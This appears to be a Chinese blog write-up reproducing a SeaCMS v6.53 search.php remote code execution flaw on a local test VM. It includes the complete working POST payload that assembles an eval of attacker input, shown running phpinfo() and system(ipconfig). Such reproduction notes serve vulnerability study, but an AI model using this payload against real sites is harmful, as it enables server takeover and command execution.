参考连接

freebuf上面的cms文章
http://www.freebuf.com/vuls/150042.html

漏洞原理

文章里说的很清楚echoSearchPage函数中的content变量传给了parself函数，跟踪代码，找到./include/main.class.php，可以看到parseIf函数会将content内容eval执行，造成命令执行。

image.png

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

通过POC可以看出，通过对参数进行了替换之后，content中已经包含了如下攻击payload：if:eval(join($_POST[9]))

跟踪代码，找到./include/main.class.php，可以看到parseIf函数会将content内容eval执行，造成命令执行

image.png

本地搭建环境测试

win7 64位虚拟机+phpstudy
网盘找对应源码
https://pan.baidu.com/s/1jHQBKFk

漏洞复现过程

下面是自己搭建的测试网站，建站上用的phpstudy没有任何问题

image.png

安装完成界面

http://127.0.0.1/seacms(v6.53)/upload/index.php

首页
http://127.0.0.1/seacms(v6.53)/upload/

后台
http://127.0.0.1/seacms(v6.53)/upload/admin/login.php?gotopage=%2Fseacms%28v6.53%29%2Fupload%2Fadmin%2F

网上提供的poc

POST /seacms(v6.53)/upload/search.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 208
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/seacms(v6.53)/upload/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: BEEFHOOK=9BIcNvrOYJ3zap74fscXQTchPtgyOGlbcO0DyQhdo7jP6k3prnO82U6v9cOOCFh1Xl8HLO0Bl417ZGSN; bdshare_firstime=1516777076849; UM_distinctid=16127562db49-05b0f0ac5b7059-454c092b-cc7fe-16127562dba35b; CNZZDATA1234139=cnzz_eid%3D1799312719-1516783434-%26ntime%3D1516783434; a4207_times=1; PHPSESSID=80dadc311b51e7ae6d8e4e57ff626241

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

执行结果，可见写入的代码被执行

TIM图片20180307181058.png

进一步利用，可以执行系统命令。

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem(ipconfig);

image.png

可以成功利用